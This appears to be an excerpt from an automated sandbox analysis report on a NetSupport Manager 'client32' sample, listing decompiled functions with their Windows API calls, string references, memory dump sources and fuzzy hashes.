                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                                                                                                                                • http://, xrefs: 11009535, 11009548
                                                                                                                                                                                • https://, xrefs: 1100952F
                                                                                                                                                                                • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                                                                                                                                • IsA(), xrefs: 110095A5, 110095CD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strncmp$FileWrite
                                                                                                                                                                                • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                                                                                                                • API String ID: 1635020204-3154135529
                                                                                                                                                                                • Opcode ID: 777effbf1b03ea283ba7092ab6f5f9b65d7917822a57282a7b9ed6d08791a330
                                                                                                                                                                                • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                                                                                                                                • Opcode Fuzzy Hash: 777effbf1b03ea283ba7092ab6f5f9b65d7917822a57282a7b9ed6d08791a330
                                                                                                                                                                                • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                                                                                                                                Function 11027450 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetWindowTextA.USER32(?,?,00000080), ref: 11027474
                                                                                                                                                                                • GetClassNameA.USER32(?,?,00000080), ref: 1102749F
                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 110274C8
                                                                                                                                                                                • GetDlgItem.USER32(?,00000004), ref: 110274CF
                                                                                                                                                                                • GetDlgItem.USER32(?,00000008), ref: 110274DA
                                                                                                                                                                                • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 110274F6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Item$ClassMessageNamePostTextWindow
                                                                                                                                                                                • String ID: #32770$Tapiexe
                                                                                                                                                                                • API String ID: 3170390011-3313516769
                                                                                                                                                                                • Opcode ID: 00ef53a8e11f5234f0ab2a6c54aecd2b9ab084972ebf54655657e2a8f1ef17bd
                                                                                                                                                                                • Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
                                                                                                                                                                                • Opcode Fuzzy Hash: 00ef53a8e11f5234f0ab2a6c54aecd2b9ab084972ebf54655657e2a8f1ef17bd
                                                                                                                                                                                • Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90
                                                                                                                                                                                Function 11023390 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2
                                                                                                                                                                                  • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 11023414
                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 11023417
                                                                                                                                                                                • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                                                • API String ID: 1605826578-1986719024
                                                                                                                                                                                • Opcode ID: 2787e60b127d7f05839954bbdc1d638e29f0609e780a2eded180e182ea32d1d8
                                                                                                                                                                                • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                                                                                                                                • Opcode Fuzzy Hash: 2787e60b127d7f05839954bbdc1d638e29f0609e780a2eded180e182ea32d1d8
                                                                                                                                                                                • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                                                                                                                                Function 11039710 Relevance: 13.6, APIs: 9, Instructions: 132windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetParent.USER32(?), ref: 11039768
                                                                                                                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 11039771
                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 11039778
                                                                                                                                                                                • PostMessageA.USER32(?,00000100,00000009,000F0001), ref: 110397A5
                                                                                                                                                                                • GetParent.USER32(?), ref: 110397B6
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 110397C3
                                                                                                                                                                                • IntersectRect.USER32(?,?,?), ref: 110397FC
                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 11039836
                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 11039855
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Rect$Parent$EnabledIntersectItemMessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 818519836-0
                                                                                                                                                                                • Opcode ID: 900f8f9573ffe5c1606fdad4226cd4c34eae0238b1281e2b9c42afcb3657311d
                                                                                                                                                                                • Instruction ID: 21b51dd7fe149e1a5d9ad7f830f962c89668f9ef243aefe38cead8d8046866f3
                                                                                                                                                                                • Opcode Fuzzy Hash: 900f8f9573ffe5c1606fdad4226cd4c34eae0238b1281e2b9c42afcb3657311d
                                                                                                                                                                                • Instruction Fuzzy Hash: D8419375A00219EFDB15CFA4CD84FEEB778FB88714F10456AF926A7684EB74A9008B50
                                                                                                                                                                                Function 1111B710 Relevance: 13.6, APIs: 9, Instructions: 100COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 1111B72B
                                                                                                                                                                                • DestroyCursor.USER32(?), ref: 1111B742
                                                                                                                                                                                • CreateCursor.USER32(00000000,0000000C,?,?,?,0000000C,?), ref: 1111B794
                                                                                                                                                                                • _free.LIBCMT ref: 1111B7A1
                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 1111B7B3
                                                                                                                                                                                • WindowFromPoint.USER32(?,?), ref: 1111B7C4
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000001), ref: 1111B7E0
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 1111B7EE
                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 1111B800
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Cursor$RectWindow$ClientCreateDestroyFromLoadPointPoints_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 706824135-0
                                                                                                                                                                                • Opcode ID: e55d5aead4c10bdefb7cf78ad9a5e4c15f4a9778984367637e95b1a0d178a251
                                                                                                                                                                                • Instruction ID: 226524b821649ccf1f1a95883727ba8dcebcdd2348bff50d2c30a10b69783e4e
                                                                                                                                                                                • Opcode Fuzzy Hash: e55d5aead4c10bdefb7cf78ad9a5e4c15f4a9778984367637e95b1a0d178a251
                                                                                                                                                                                • Instruction Fuzzy Hash: DC31B475A00615AFD704DFB5CD84A7BF7B8FF48705F008529E8258B644E774E941C7A0
                                                                                                                                                                                Function 110CD940 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32 ref: 111103DE
                                                                                                                                                                                  • Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,00000000,00000000,111F2118,?,1114671F,00000000,?,11091A93,00002710,04CF0000,80000000,80000000,000001C2,0000015E,00000000), ref: 111103E8
                                                                                                                                                                                  • Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,?,1114671F,00000000,?,11091A93,00002710,04CF0000,80000000,80000000,000001C2,0000015E,00000000,00000000), ref: 11110408
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00000000,00000000,75BF35B0,00000000,75BF3760,00000000,?,?,?,11093540,?,00000000,?,00000000), ref: 110CD95B
                                                                                                                                                                                • SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                                                                                                                • SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,11093540,?,00000000,?,00000000), ref: 110CD9A4
                                                                                                                                                                                • IsDialogMessageA.USER32(00000000,?,?,?,?,11093540,?,00000000,?,00000000), ref: 110CD9BB
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,?,?,11093540,?,00000000,?,00000000), ref: 110CD9D1
                                                                                                                                                                                • DestroyWindow.USER32(00000000,?,?,?,11093540,?,00000000,?,00000000), ref: 110CD9E1
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,11093540,?,00000000,?,00000000), ref: 110CD9EB
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,11093540,?,00000000,?,00000000), ref: 110CDA01
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1497311044-0
                                                                                                                                                                                • Opcode ID: 9ff05f3c4b943bd688be13dc128e913b4b0bdaab6c114c7f48e15840be3937b4
                                                                                                                                                                                • Instruction ID: b02c8bb8fc4c5bab3a2fa1ad08f5b589118d407137368f819e71080725a4af13
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ff05f3c4b943bd688be13dc128e913b4b0bdaab6c114c7f48e15840be3937b4
                                                                                                                                                                                • Instruction Fuzzy Hash: 5521D636B41218ABE710DFA8E988BDEB7E9EB49755F0040E6F918D7640D771AD008BE0
                                                                                                                                                                                Function 11113570 Relevance: 13.6, APIs: 9, Instructions: 77COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetStockObject.GDI32(00000003), ref: 111135A7
                                                                                                                                                                                • FillRect.USER32(?,?,00000000), ref: 111135C4
                                                                                                                                                                                • FillRect.USER32(?,?,00000000), ref: 111135D2
                                                                                                                                                                                • SetROP2.GDI32(?,00000007), ref: 111135FE
                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 1111360A
                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 11113615
                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 11113620
                                                                                                                                                                                • SetTextJustification.GDI32(?,?,?), ref: 11113631
                                                                                                                                                                                • SetTextCharacterExtra.GDI32(?,?), ref: 1111363D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1094208222-0
                                                                                                                                                                                • Opcode ID: 3cd6e25ae63871983c2e847a98f5fc6d4ccd1d333e6029d37676626f0d7eca56
                                                                                                                                                                                • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                                                                                                                                • Opcode Fuzzy Hash: 3cd6e25ae63871983c2e847a98f5fc6d4ccd1d333e6029d37676626f0d7eca56
                                                                                                                                                                                • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                                                                                                                                Function 1100D4C0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11196940), ref: 1100D4D4
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11196930), ref: 1100D4E8
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11196920), ref: 1100D4FD
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11196910), ref: 1100D511
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11196904), ref: 1100D525
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,111968E4), ref: 1100D53A
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,111968C4), ref: 1100D54E
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,111968B4), ref: 1100D562
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,111968A4), ref: 1100D577
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 190572456-0
                                                                                                                                                                                • Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                                                                                                                • Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
                                                                                                                                                                                • Opcode Fuzzy Hash: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                                                                                                                • Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60
                                                                                                                                                                                Function 1112B5F0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 212windowtimeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnumWindows.USER32(1112B540,?), ref: 1112B648
                                                                                                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 1112B699
                                                                                                                                                                                • GetWindowTextA.USER32(?,?,00000104), ref: 1112B6D9
                                                                                                                                                                                • SendMessageTimeoutA.USER32(?,00000000,00000000,00000000,00000002,000001F4,?), ref: 1112B784
                                                                                                                                                                                • _memmove.LIBCMT ref: 1112B7FF
                                                                                                                                                                                • DeleteDC.GDI32(?), ref: 1112B87B
                                                                                                                                                                                Strings
